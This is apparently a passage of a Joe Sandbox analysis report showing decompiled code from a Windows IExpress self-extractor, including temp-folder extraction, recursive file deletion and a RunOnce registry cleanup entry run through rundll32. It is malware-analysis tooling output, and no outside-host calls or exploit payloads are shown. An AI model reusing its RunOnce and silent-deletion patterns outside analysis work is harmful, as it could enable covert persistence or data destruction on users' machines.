                                                                        				_v8 = _t9 ^ _t46;
                                                                        				if( *0xf88a38 != 0) {
                                                                        					L5:
                                                                        					_t11 = E00F85164(_t52);
                                                                        					_t53 = _t11;
                                                                        					if(_t11 == 0) {
                                                                        						L16:
                                                                        						_t12 = 0;
                                                                        						L17:
                                                                        						return E00F86CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                        					}
                                                                        					_t14 = E00F855A0(_t53); // executed
                                                                        					if(_t14 == 0) {
                                                                        						goto L16;
                                                                        					} else {
                                                                        						_t45 = 0x105;
                                                                        						GetSystemDirectoryA( &_v272, 0x105);
                                                                        						_t43 = 0x105;
                                                                        						_t40 =  &_v272;
                                                                        						E00F8658A( &_v272, 0x105, "advapi32.dll");
                                                                        						_t36 = LoadLibraryA( &_v272);
                                                                        						_t44 = 0;
                                                                        						if(_t36 != 0) {
                                                                        							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                        							_v276 = _t31;
                                                                        							if(_t31 != 0) {
                                                                        								_t45 = _t47;
                                                                        								_t40 = _t31;
                                                                        								 *0xf8a288("C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\", 0); // executed
                                                                        								_v276();
                                                                        								if(_t47 != _t47) {
                                                                        									_t40 = 4;
                                                                        									asm("int 0x29");
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						FreeLibrary(_t36);
                                                                        						_t58 =  *0xf88a24 - _t44; // 0x0
                                                                        						if(_t58 != 0) {
                                                                        							L14:
                                                                        							_t21 = SetCurrentDirectoryA("C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\"); // executed
                                                                        							if(_t21 != 0) {
                                                                        								__eflags =  *0xf88a2c - _t44; // 0x0
                                                                        								if(__eflags != 0) {
                                                                        									L20:
                                                                        									__eflags =  *0xf88d48 & 0x000000c0;
                                                                        									if(( *0xf88d48 & 0x000000c0) == 0) {
                                                                        										_t41 =  *0xf89a40; // 0x3, executed
                                                                        										_t26 = E00F8256D(_t41); // executed
                                                                        										_t44 = _t26;
                                                                        									}
                                                                        									_t22 =  *0xf88a24; // 0x0
                                                                        									 *0xf89a44 = _t44;
                                                                        									__eflags = _t22;
                                                                        									if(_t22 != 0) {
                                                                        										L26:
                                                                        										__eflags =  *0xf88a38;
                                                                        										if( *0xf88a38 == 0) {
                                                                        											__eflags = _t22;
                                                                        											if(__eflags == 0) {
                                                                        												E00F84169(__eflags);
                                                                        											}
                                                                        										}
                                                                        										_t12 = 1;
                                                                        										goto L17;
                                                                        									} else {
                                                                        										__eflags =  *0xf89a30 - _t22; // 0x0
                                                                        										if(__eflags != 0) {
                                                                        											goto L26;
                                                                        										}
                                                                        										_t25 = E00F83BA2(); // executed
                                                                        										__eflags = _t25;
                                                                        										if(_t25 == 0) {
                                                                        											goto L16;
                                                                        										}
                                                                        										_t22 =  *0xf88a24; // 0x0
                                                                        										goto L26;
                                                                        									}
                                                                        								}
                                                                        								_t27 = E00F83B26(_t40, _t44);
                                                                        								__eflags = _t27;
                                                                        								if(_t27 == 0) {
                                                                        									goto L16;
                                                                        								}
                                                                        								goto L20;
                                                                        							}
                                                                        							_t43 = 0x4bc;
                                                                        							E00F844B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                        							 *0xf89124 = E00F86285();
                                                                        							goto L16;
                                                                        						}
                                                                        						_t59 =  *0xf89a30 - _t44; // 0x0
                                                                        						if(_t59 != 0) {
                                                                        							goto L14;
                                                                        						}
                                                                        						_t30 = E00F8621E(); // executed
                                                                        						if(_t30 == 0) {
                                                                        							goto L16;
                                                                        						}
                                                                        						goto L14;
                                                                        					}
                                                                        				}
                                                                        				_t49 =  *0xf88a24;
                                                                        				if( *0xf88a24 != 0) {
                                                                        					L4:
                                                                        					_t34 = E00F83A3F(_t51);
                                                                        					_t52 = _t34;
                                                                        					if(_t34 == 0) {
                                                                        						goto L16;
                                                                        					}
                                                                        					goto L5;
                                                                        				}
                                                                        				if(E00F851E5(_t49) == 0) {
                                                                        					goto L16;
                                                                        				}
                                                                        				_t51 =  *0xf88a38;
                                                                        				if( *0xf88a38 != 0) {
                                                                        					goto L5;
                                                                        				}
                                                                        				goto L4;
                                                                        			}

                                                                        APIs
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00F82F93
                                                                        • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00F82FB2
                                                                        • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00F82FC6
                                                                        • DecryptFileA.ADVAPI32 ref: 00F82FE6
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00F82FF8
                                                                        • SetCurrentDirectoryA.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\), ref: 00F8301C
                                                                          • Part of subcall function 00F851E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00F82F4D,?,00000002,00000000), ref: 00F85201
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
                                                                        • API String ID: 2126469477-1230860006
                                                                        • Opcode ID: bcbccdad3ed7132603c9194ae5d319402f439655927c5c6351db533c50700f03
                                                                        • Instruction ID: f20763a2e5a02874e9fa1203687ee84706cf32ad9a8377525767a4db6e61fc56
                                                                        • Opcode Fuzzy Hash: bcbccdad3ed7132603c9194ae5d319402f439655927c5c6351db533c50700f03
                                                                        • Instruction Fuzzy Hash: 0341AB31E006095BDB34BB719C496FA33A8EB44F69F040566E941C21A1EF7CDE81FB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 86%
                                                                        			E00F82390(CHAR* __ecx) {
                                                                        				signed int _v8;
                                                                        				char _v276;
                                                                        				char _v280;
                                                                        				char _v284;
                                                                        				struct _WIN32_FIND_DATAA _v596;
                                                                        				struct _WIN32_FIND_DATAA _v604;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t21;
                                                                        				int _t36;
                                                                        				void* _t46;
                                                                        				void* _t62;
                                                                        				void* _t63;
                                                                        				CHAR* _t65;
                                                                        				void* _t66;
                                                                        				signed int _t67;
                                                                        				signed int _t69;
                                                                        
                                                                        				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                        				_t21 =  *0xf88004; // 0x7e92e7a6
                                                                        				_t22 = _t21 ^ _t69;
                                                                        				_v8 = _t21 ^ _t69;
                                                                        				_t65 = __ecx;
                                                                        				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                        					L10:
                                                                        					_pop(_t62);
                                                                        					_pop(_t66);
                                                                        					_pop(_t46);
                                                                        					return E00F86CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                        				} else {
                                                                        					E00F81680( &_v276, 0x104, __ecx);
                                                                        					_t58 = 0x104;
                                                                        					E00F816B3( &_v280, 0x104, "*");
                                                                        					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                        					_t63 = _t22;
                                                                        					if(_t63 == 0xffffffff) {
                                                                        						goto L10;
                                                                        					} else {
                                                                        						goto L3;
                                                                        					}
                                                                        					do {
                                                                        						L3:
                                                                        						_t58 = 0x104;
                                                                        						E00F81680( &_v276, 0x104, _t65);
                                                                        						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                        							_t58 = 0x104;
                                                                        							E00F816B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                        							SetFileAttributesA( &_v280, 0x80);
                                                                        							DeleteFileA( &_v280);
                                                                        						} else {
                                                                        							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                        								E00F816B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                        								_t58 = 0x104;
                                                                        								E00F8658A( &_v280, 0x104, 0xf81140);
                                                                        								E00F82390( &_v284);
                                                                        							}
                                                                        						}
                                                                        						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                        					} while (_t36 != 0);
                                                                        					FindClose(_t63); // executed
                                                                        					_t22 = RemoveDirectoryA(_t65); // executed
                                                                        					goto L10;
                                                                        				}
                                                                        			}






















                                                                        APIs
                                                                        • FindFirstFileA.KERNELBASE(?,00F88A3A,00F811F4,00F88A3A,00000000,?,?), ref: 00F823F6
                                                                        • lstrcmpA.KERNEL32(?,00F811F8), ref: 00F82427
                                                                        • lstrcmpA.KERNEL32(?,00F811FC), ref: 00F8243B
                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00F82495
                                                                        • DeleteFileA.KERNEL32(?), ref: 00F824A3
                                                                        • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00F824AF
                                                                        • FindClose.KERNELBASE(00000000), ref: 00F824BE
                                                                        • RemoveDirectoryA.KERNELBASE(00F88A3A), ref: 00F824C5
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                        • String ID:
                                                                        • API String ID: 836429354-0
                                                                        • Opcode ID: c979d330c0667f11ab6b97c9f76434d2536325f44af3740a3f5e5eec8b0b8bdb
                                                                        • Instruction ID: a9554f6427ecacb57b66aa92150df3aed3f9a059f18b6fa2a678f031dde96c8e
                                                                        • Opcode Fuzzy Hash: c979d330c0667f11ab6b97c9f76434d2536325f44af3740a3f5e5eec8b0b8bdb
                                                                        • Instruction Fuzzy Hash: 5C31A4326046449BD320FB64CC8DAFB73ACFBC4315F044A2EB59586191EB38A90DE762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 70%
                                                                        			E00F82BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				long _t4;
                                                                        				void* _t6;
                                                                        				intOrPtr _t7;
                                                                        				void* _t9;
                                                                        				struct HINSTANCE__* _t12;
                                                                        				intOrPtr* _t17;
                                                                        				signed char _t19;
                                                                        				intOrPtr* _t21;
                                                                        				void* _t22;
                                                                        				void* _t24;
                                                                        				intOrPtr _t32;
                                                                        
                                                                        				_t4 = GetVersion();
                                                                        				if(_t4 >= 0 && _t4 >= 6) {
                                                                        					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                        					if(_t12 != 0) {
                                                                        						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                        						if(_t21 != 0) {
                                                                        							_t17 = _t21;
                                                                        							 *0xf8a288(0, 1, 0, 0);
                                                                        							 *_t21();
                                                                        							_t29 = _t24 - _t24;
                                                                        							if(_t24 != _t24) {
                                                                        								_t17 = 4;
                                                                        								asm("int 0x29");
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_t20 = _a12;
                                                                        				_t18 = _a4;
                                                                        				 *0xf89124 = 0;
                                                                        				if(E00F82CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                        					_t9 = E00F82F1D(_t18, _t20); // executed
                                                                        					_t22 = _t9; // executed
                                                                        					E00F852B6(0, _t18, _t21, _t22); // executed
                                                                        					if(_t22 != 0) {
                                                                        						_t32 =  *0xf88a3a; // 0x0
                                                                        						if(_t32 == 0) {
                                                                        							_t19 =  *0xf89a2c; // 0x0
                                                                        							if((_t19 & 0x00000001) != 0) {
                                                                        								E00F81F90(_t19, _t21, _t22);
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_t6 =  *0xf88588; // 0x0
                                                                        				if(_t6 != 0) {
                                                                        					CloseHandle(_t6);
                                                                        				}
                                                                        				_t7 =  *0xf89124; // 0x0
                                                                        				return _t7;
                                                                        			}



















                                                                        APIs
                                                                        • GetVersion.KERNEL32(?,00000002,00000000,?,00F86BB0,00F80000,00000000,00000002,0000000A), ref: 00F82C03
                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00F86BB0,00F80000,00000000,00000002,0000000A), ref: 00F82C18
                                                                        • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00F82C28
                                                                        • CloseHandle.KERNEL32(00000000,?,?,00F86BB0,00F80000,00000000,00000002,0000000A), ref: 00F82C98
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$AddressCloseModuleProcVersion
                                                                        • String ID: HeapSetInformation$Kernel32.dll
                                                                        • API String ID: 62482547-3460614246
                                                                        • Opcode ID: f107ff75c3fb92ed1015a97dd0e6639845a99575e0eff3b8fdd9f94bdbfc6152
                                                                        • Instruction ID: 52c38db67b8fd60d8f09db365db038afa0e25b4986ac1d98230e9f705d5bcd45
                                                                        • Opcode Fuzzy Hash: f107ff75c3fb92ed1015a97dd0e6639845a99575e0eff3b8fdd9f94bdbfc6152
                                                                        • Instruction Fuzzy Hash: BF11C271B00209ABD7607BB4AD89AFF3799EB857B0B480116F901D3290DA34EC02B761
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F86F40() {
                                                                        
                                                                        				SetUnhandledExceptionFilter(E00F86EF0); // executed
                                                                        				return 0;
                                                                        			}



                                                                        0x00f86f45
                                                                        0x00f86f4d

                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00F86F45
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: dae1ced55becba8e13b6ee622af3e3aa7709d32da19aaf2b61572c28105cdcd1
                                                                        • Instruction ID: d06b3b73c0c6c0847991cea048146f7397a18d211874e00cbc045d104fde6eee
                                                                        • Opcode Fuzzy Hash: dae1ced55becba8e13b6ee622af3e3aa7709d32da19aaf2b61572c28105cdcd1
                                                                        • Instruction Fuzzy Hash: B390027425150447A6102B70DD1D4A576919B4D602F8154A1A111C4499DB6080407B17
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 93%
                                                                        			E00F8202A(struct HINSTANCE__* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v528;
                                                                        				void* _v532;
                                                                        				int _v536;
                                                                        				int _v540;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t28;
                                                                        				long _t36;
                                                                        				long _t41;
                                                                        				struct HINSTANCE__* _t46;
                                                                        				intOrPtr _t49;
                                                                        				intOrPtr _t50;
                                                                        				CHAR* _t54;
                                                                        				void _t56;
                                                                        				signed int _t66;
                                                                        				intOrPtr* _t72;
                                                                        				void* _t73;
                                                                        				void* _t75;
                                                                        				void* _t80;
                                                                        				intOrPtr* _t81;
                                                                        				void* _t86;
                                                                        				void* _t87;
                                                                        				void* _t90;
                                                                        				_Unknown_base(*)()* _t91;
                                                                        				signed int _t93;
                                                                        				void* _t94;
                                                                        				void* _t95;
                                                                        
                                                                        				_t79 = __edx;
                                                                        				_t28 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t28 ^ _t93;
                                                                        				_t84 = 0x104;
                                                                        				memset( &_v268, 0, 0x104);
                                                                        				memset( &_v528, 0, 0x104);
                                                                        				_t95 = _t94 + 0x18;
                                                                        				_t66 = 0;
                                                                        				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                        				if(_t36 != 0) {
                                                                        					L24:
                                                                        					return E00F86CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                        				}
                                                                        				_push(_t86);
                                                                        				_t87 = 0;
                                                                        				while(1) {
                                                                        					E00F8171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
                                                                        					_t95 = _t95 + 0x10;
                                                                        					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
                                                                        					if(_t41 != 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t87 = _t87 + 1;
                                                                        					if(_t87 < 0xc8) {
                                                                        						continue;
                                                                        					}
                                                                        					break;
                                                                        				}
                                                                        				if(_t87 != 0xc8) {
                                                                        					GetSystemDirectoryA( &_v528, _t84);
                                                                        					_t79 = _t84;
                                                                        					E00F8658A( &_v528, _t84, "advpack.dll");
                                                                        					_t46 = LoadLibraryA( &_v528); // executed
                                                                        					_t84 = _t46;
                                                                        					if(_t84 == 0) {
                                                                        						L10:
                                                                        						if(GetModuleFileNameA( *0xf89a3c,  &_v268, 0x104) == 0) {
                                                                        							L17:
                                                                        							_t36 = RegCloseKey(_v532);
                                                                        							L23:
                                                                        							_pop(_t86);
                                                                        							goto L24;
                                                                        						}
                                                                        						L11:
                                                                        						_t72 =  &_v268;
                                                                        						_t80 = _t72 + 1;
                                                                        						do {
                                                                        							_t49 =  *_t72;
                                                                        							_t72 = _t72 + 1;
                                                                        						} while (_t49 != 0);
                                                                        						_t73 = _t72 - _t80;
                                                                        						_t81 = 0xf891e4;
                                                                        						do {
                                                                        							_t50 =  *_t81;
                                                                        							_t81 = _t81 + 1;
                                                                        						} while (_t50 != 0);
                                                                        						_t84 = _t73 + 0x50 + _t81 - 0xf891e5;
                                                                        						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xf891e5);
                                                                        						if(_t90 != 0) {
                                                                        							 *0xf88580 = _t66 ^ 0x00000001;
                                                                        							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                        							if(_t66 == 0) {
                                                                        								_t54 = "%s /D:%s";
                                                                        							}
                                                                        							_push("C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\");
                                                                        							E00F8171E(_t90, _t84, _t54,  &_v268);
                                                                        							_t75 = _t90;
                                                                        							_t23 = _t75 + 1; // 0x1
                                                                        							_t79 = _t23;
                                                                        							do {
                                                                        								_t56 =  *_t75;
                                                                        								_t75 = _t75 + 1;
                                                                        							} while (_t56 != 0);
                                                                        							_t24 = _t75 - _t79 + 1; // 0x2
                                                                        							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
                                                                        							RegCloseKey(_v532); // executed
                                                                        							_t36 = LocalFree(_t90);
                                                                        							goto L23;
                                                                        						}
                                                                        						_t79 = 0x4b5;
                                                                        						E00F844B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                        						goto L17;
                                                                        					}
                                                                        					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                        					_t66 = 0 | _t91 != 0x00000000;
                                                                        					FreeLibrary(_t84); // executed
                                                                        					if(_t91 == 0) {
                                                                        						goto L10;
                                                                        					}
                                                                        					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                        						E00F8658A( &_v268, 0x104, 0xf81140);
                                                                        					}
                                                                        					goto L11;
                                                                        				}
                                                                        				_t36 = RegCloseKey(_v532);
                                                                        				 *0xf88530 = _t66;
                                                                        				goto L23;
                                                                        			}


                                                                        APIs
                                                                        • memset.MSVCRT ref: 00F82050
                                                                        • memset.MSVCRT ref: 00F8205F
                                                                        • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00F8208C
                                                                          • Part of subcall function 00F8171E: _vsnprintf.MSVCRT ref: 00F81750
                                                                        • RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F820C9
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F820EA
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00F82103
                                                                        • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F82122
                                                                        • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00F82134
                                                                        • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F82144
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00F8215B
                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F8218C
                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F821C1
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F821E4
                                                                        • RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00F8223D
                                                                        • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F82249
                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F82250
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                        • String ID: %s /D:%s$C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
                                                                        • API String ID: 178549006-1563176777
                                                                        • Opcode ID: fd6663e54b9b195fc5ccb77196dc5fc40fda38d6e7488c2591b08e70c146e0d3
                                                                        • Instruction ID: 6b316da6f59a7a3cf4263eab61548626dd7e162b3abf940f31fbbe296dc1fa0f
                                                                        • Opcode Fuzzy Hash: fd6663e54b9b195fc5ccb77196dc5fc40fda38d6e7488c2591b08e70c146e0d3
                                                                        • Instruction Fuzzy Hash: 1F511572A00218ABEB20BF60DC4DFFB777CEB40750F1401A9FA05E7151DA75AE45AB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 92%
                                                                        			E00F855A0(void* __eflags) {
                                                                        				signed int _v8;
                                                                        				char _v265;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t28;
                                                                        				int _t32;
                                                                        				int _t33;
                                                                        				int _t35;
                                                                        				signed int _t36;
                                                                        				signed int _t38;
                                                                        				int _t40;
                                                                        				int _t44;
                                                                        				long _t48;
                                                                        				int _t49;
                                                                        				int _t50;
                                                                        				signed int _t53;
                                                                        				int _t54;
                                                                        				int _t59;
                                                                        				char _t60;
                                                                        				int _t65;
                                                                        				char _t66;
                                                                        				int _t67;
                                                                        				int _t68;
                                                                        				int _t69;
                                                                        				int _t70;
                                                                        				int _t71;
                                                                        				struct _SECURITY_ATTRIBUTES* _t72;
                                                                        				int _t73;
                                                                        				CHAR* _t82;
                                                                        				CHAR* _t88;
                                                                        				void* _t103;
                                                                        				signed int _t110;
                                                                        
                                                                        				_t28 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t28 ^ _t110;
                                                                        				_t2 = E00F8468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                        				_t109 = LocalAlloc(0x40, _t2);
                                                                        				if(_t109 != 0) {
                                                                        					_t82 = "RUNPROGRAM";
                                                                        					_t32 = E00F8468F(_t82, _t109, 1);
                                                                        					__eflags = _t32;
                                                                        					if(_t32 != 0) {
                                                                        						_t33 = lstrcmpA(_t109, "<None>");
                                                                        						__eflags = _t33;
                                                                        						if(_t33 == 0) {
                                                                        							 *0xf89a30 = 1;
                                                                        						}
                                                                        						LocalFree(_t109);
                                                                        						_t35 =  *0xf88b3e; // 0x0
                                                                        						__eflags = _t35;
                                                                        						if(_t35 == 0) {
                                                                        							__eflags =  *0xf88a24; // 0x0
                                                                        							if(__eflags != 0) {
                                                                        								L46:
                                                                        								_t101 = 0x7d2;
                                                                        								_t36 = E00F86517(_t82, 0x7d2, 0, E00F83210, 0, 0);
                                                                        								asm("sbb eax, eax");
                                                                        								_t38 =  ~( ~_t36);
                                                                        							} else {
                                                                        								__eflags =  *0xf89a30; // 0x0
                                                                        								if(__eflags != 0) {
                                                                        									goto L46;
                                                                        								} else {
                                                                        									_t109 = 0xf891e4;
                                                                        									_t40 = GetTempPathA(0x104, 0xf891e4);
                                                                        									__eflags = _t40;
                                                                        									if(_t40 == 0) {
                                                                        										L19:
                                                                        										_push(_t82);
                                                                        										E00F81781( &_v268, 0x104, _t82, "A:\\");
                                                                        										__eflags = _v268 - 0x5a;
                                                                        										if(_v268 <= 0x5a) {
                                                                        											do {
                                                                        												_t109 = GetDriveTypeA( &_v268);
                                                                        												__eflags = _t109 - 6;
                                                                        												if(_t109 == 6) {
                                                                        													L22:
                                                                        													_t48 = GetFileAttributesA( &_v268);
                                                                        													__eflags = _t48 - 0xffffffff;
                                                                        													if(_t48 != 0xffffffff) {
                                                                        														goto L30;
                                                                        													} else {
                                                                        														goto L23;
                                                                        													}
                                                                        												} else {
                                                                        													__eflags = _t109 - 3;
                                                                        													if(_t109 != 3) {
                                                                        														L23:
                                                                        														__eflags = _t109 - 2;
                                                                        														if(_t109 != 2) {
                                                                        															L28:
                                                                        															_t66 = _v268;
                                                                        															goto L29;
                                                                        														} else {
                                                                        															_t66 = _v268;
                                                                        															__eflags = _t66 - 0x41;
                                                                        															if(_t66 == 0x41) {
                                                                        																L29:
                                                                        																_t60 = _t66 + 1;
                                                                        																_v268 = _t60;
                                                                        																goto L42;
                                                                        															} else {
                                                                        																__eflags = _t66 - 0x42;
                                                                        																if(_t66 == 0x42) {
                                                                        																	goto L29;
                                                                        																} else {
                                                                        																	_t68 = E00F86952( &_v268);
                                                                        																	__eflags = _t68;
                                                                        																	if(_t68 == 0) {
                                                                        																		goto L28;
                                                                        																	} else {
                                                                        																		__eflags = _t68 - 0x19000;
                                                                        																		if(_t68 >= 0x19000) {
                                                                        																			L30:
                                                                        																			_push(0);
                                                                        																			_t103 = 3;
